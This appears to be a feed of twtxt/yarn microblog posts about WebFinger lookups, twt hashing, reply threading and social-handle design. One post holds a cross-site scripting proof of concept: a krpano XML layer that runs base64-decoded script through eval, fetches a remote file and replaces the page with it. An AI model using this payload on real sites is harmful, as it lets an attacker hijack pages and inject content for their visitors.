i have probably watched through them a half dozen times each. some more :D
@nick@domain
Support this by doing a WebFinger lookup to get the URL.
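A rough sketch of what that lookup could look like in Go, assuming the standard RFC 7033 endpoint; the rel value used to pick out the feed link is a made-up placeholder here, not something any server necessarily publishes:

// Sketch: resolve nick@domain to a feed URL via a WebFinger (RFC 7033) query.
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/url"
)

type webfingerResponse struct {
	Links []struct {
		Rel  string `json:"rel"`
		Href string `json:"href"`
	} `json:"links"`
}

func lookupFeedURL(nick, domain string) (string, error) {
	endpoint := fmt.Sprintf("https://%s/.well-known/webfinger?resource=%s",
		domain, url.QueryEscape("acct:"+nick+"@"+domain))
	resp, err := http.Get(endpoint)
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()

	var wf webfingerResponse
	if err := json.NewDecoder(resp.Body).Decode(&wf); err != nil {
		return "", err
	}
	for _, l := range wf.Links {
		if l.Rel == "https://twtxt.dev/rel/feed" { // placeholder rel for the twtxt feed
			return l.Href, nil
		}
	}
	return "", fmt.Errorf("no feed link for %s@%s", nick, domain)
}

func main() {
	u, err := lookupFeedURL("nick", "example.com")
	fmt.Println(u, err)
}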
The xml parameter has a URL that contains the following:
<?xml version="1.0"?>
<krpano version="1.0.8.15">
<SCRIPT id="allow-copy_script"/>
<layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>
The OMIT above is the base64-encoded version of the script below:
const queryParams = new URLSearchParams(window.location.search),
      id = queryParams.get('id');
id ? fetch('https://sour.is/superhax.txt')
      .then(e => e.text())
      .then(e => {
        document.open(), document.write(e), document.close();
      })
      .catch(e => {
        console.error('Error fetching the user agent:', e);
      })
  : console.error('No');
This script fetches the text at https://sour.is/superhax.txt and replaces the document contents with it.


fisherman.
https://domain.com/.well-known/twtxt/:domain/:user
The business card test is this: can you write it on your business card and have the person you give it to figure it out without added context?
- phone number: yes, because everyone knows what a phone number is.
- email address: yes, everyone knows email, and their AOL or Prodigy will let them send one.
- twitter/x/insta/pinterest handle: no. what's a twitter? do i need to sign up?
- domain name: yes, it's simple and you just type it into a browser, right?
- twtxt url: kinda? it's a bit long, and is that a forward slash or a backward slash?
By default, the bsky.social URLs all redirect to the user's feed, like hmpxvt.bsky.social.
Many custom URLs redirect to some kind of linktree or just their feed (cwebonline.com or la.bonne.petite.sour.is), or, if you are a major outlet, straight to your web presence like https://theonion.com or https://netflix.com.
It's just good SEO practice.
Do all nostr addresses take you to the person if typed into a browser? That is the secret sauce.
No having to go to some random page first. No accounts. No apps to install. Just direct to the person.
https://cses.fi/book/book.pdf


https://emilyliu.me/blog/open-network
When yarn used to have blogs, I thought something like this would be a great feature: having the blog comments tied to a twtxt subject for the blog post.

{{ .Profile.URI }}
and that is making my hashes wrong, so it cannot delete or edit twts.

> Error: Error deleting last twt
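For context on why that URI matters: as I understand the Twt Hash extension, the hash is computed over the feed URL, the timestamp, and the text, so if {{ .Profile.URI }} renders a different URL than the one the twt was originally hashed with, every lookup by hash misses. A rough sketch (the exact encoding details here are my assumption, check the spec):

package main

import (
	"encoding/base32"
	"fmt"
	"strings"

	"golang.org/x/crypto/blake2b"
)

// twtHash follows my reading of the Twt Hash extension: blake2b-256 over
// "url\ntimestamp\ntext", base32 (no padding, lowercased), keep the last 7 chars.
func twtHash(feedURL, timestamp, text string) string {
	payload := feedURL + "\n" + timestamp + "\n" + text
	sum := blake2b.Sum256([]byte(payload))
	enc := base32.StdEncoding.WithPadding(base32.NoPadding)
	h := strings.ToLower(enc.EncodeToString(sum[:]))
	return h[len(h)-7:]
}

func main() {
	// Same twt, two different profile URIs -> two different hashes,
	// so delete/edit by hash will not find the original.
	fmt.Println(twtHash("https://example.com/twtxt.txt", "2024-09-18T23:08:00Z", "hello"))
	fmt.Println(twtHash("https://example.com/user/me/twtxt.txt", "2024-09-18T23:08:00Z", "hello"))
}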

So for twt metadata, the lextwt parser currently supports values in the form
[key=value]
https://git.mills.io/yarnsocial/go-lextwt/src/branch/main/parser_test.go#L692-L698
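Just to illustrate the shape of that syntax (this is not the lextwt API, the keys are made up, and the real grammar lives in the linked tests):

package main

import (
	"fmt"
	"regexp"
)

// Toy [key=value] extraction with a regex; lextwt does proper lexing instead.
var kvPattern = regexp.MustCompile(`\[(\w+)=([^\]]+)\]`)

func main() {
	twt := "replying with some metadata [lang=en] [license=CC0]"
	for _, m := range kvPattern.FindAllStringSubmatch(twt, -1) {
		fmt.Printf("key=%q value=%q\n", m[1], m[2])
	}
}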
Maybe one day enough states will make it into the NaPo InterCo (the National Popular Vote Interstate Compact) to finally put the Electoral College to rest.
We would need to come up with a way of registering with multiple brokers that can, I guess, forward to a reader broker; something that will retry if needed. I need to read up on how SimpleX handles multiple brokers.
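Something like this is the rough idea, as a generic sketch only; registerWith is a placeholder and nothing here is how SimpleX actually does it:

package main

import (
	"fmt"
	"time"
)

// registerWith is a stand-in for whatever the real registration handshake ends up being.
func registerWith(broker string) error {
	fmt.Println("registering with", broker)
	return nil
}

// registerAll tries each broker a few times and remembers which ones accepted,
// so they can later forward messages on to a reader broker.
func registerAll(brokers []string, attempts int) []string {
	var accepted []string
	for _, b := range brokers {
		for i := 0; i < attempts; i++ {
			if err := registerWith(b); err == nil {
				accepted = append(accepted, b)
				break
			}
			time.Sleep(time.Second << i) // simple exponential backoff between retries
		}
	}
	return accepted
}

func main() {
	ok := registerAll([]string{"broker-a.example", "broker-b.example"}, 3)
	fmt.Println("registered with:", ok)
}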
i like this one
Really we should all think hard about how changes will break things and if those breakages are acceptable.
Super simple:

Making a reply:
0. If yarn has one, use that. (Maybe do a collision check?)
1. Make a hash of the raw twt, with no truncation.
2. Check the local cache for the shortest prefix with no collision
- in SQL (pseudo): select len(subject) where head_full_hash like subject || '%'

Threading:
1. Get the full hash of the head twt.
2. Search for twts that reply to it
- in SQL (pseudo): head_full_hash like subject || '%' and created_on > head_timestamp

The assumption being that replies will usually be to the most recent head; if replying to an older one, it will use a longer hash. (There's a sketch of both lookups after this list.)
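A standalone sketch of both lookups over an in-memory cache instead of SQL (field and function names are mine, not yarn's):

package main

import (
	"fmt"
	"strings"
)

// Twt is a minimal stand-in for a cached twt.
type Twt struct {
	Hash    string // full, untruncated hash of this twt
	Subject string // hash prefix this twt replies to ("" if not a reply)
	Created int64  // unix timestamp
}

// shortestUniquePrefix returns the shortest prefix of full (at least min chars
// long) that no other cached twt's hash also starts with.
func shortestUniquePrefix(full string, cache []Twt, min int) string {
	for n := min; n <= len(full); n++ {
		prefix := full[:n]
		unique := true
		for _, t := range cache {
			if t.Hash != full && strings.HasPrefix(t.Hash, prefix) {
				unique = false
				break
			}
		}
		if unique {
			return prefix
		}
	}
	return full
}

// replies mirrors the "head_full_hash like subject || '%' and created_on >
// head_timestamp" query: newer twts whose subject is a prefix of the head's hash.
func replies(head Twt, cache []Twt) []Twt {
	var out []Twt
	for _, t := range cache {
		if t.Subject != "" && strings.HasPrefix(head.Hash, t.Subject) && t.Created > head.Created {
			out = append(out, t)
		}
	}
	return out
}

func main() {
	head := Twt{Hash: "abcdefg1234567", Created: 100}
	cache := []Twt{
		head,
		{Hash: "abczzzz9999999", Created: 50},                       // shares the "abc" prefix
		{Hash: "ffff00011122233", Subject: "abcdefg", Created: 200}, // a reply to head
	}
	fmt.Println(shortestUniquePrefix(head.Hash, cache, 2)) // "abcd"
	fmt.Println(len(replies(head, cache)))                 // 1
}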
Though I suppose it has to be the greater of the two. But I don't even have one euro to start with.

It's replacing the contents of the body for some reason.

git show 64bf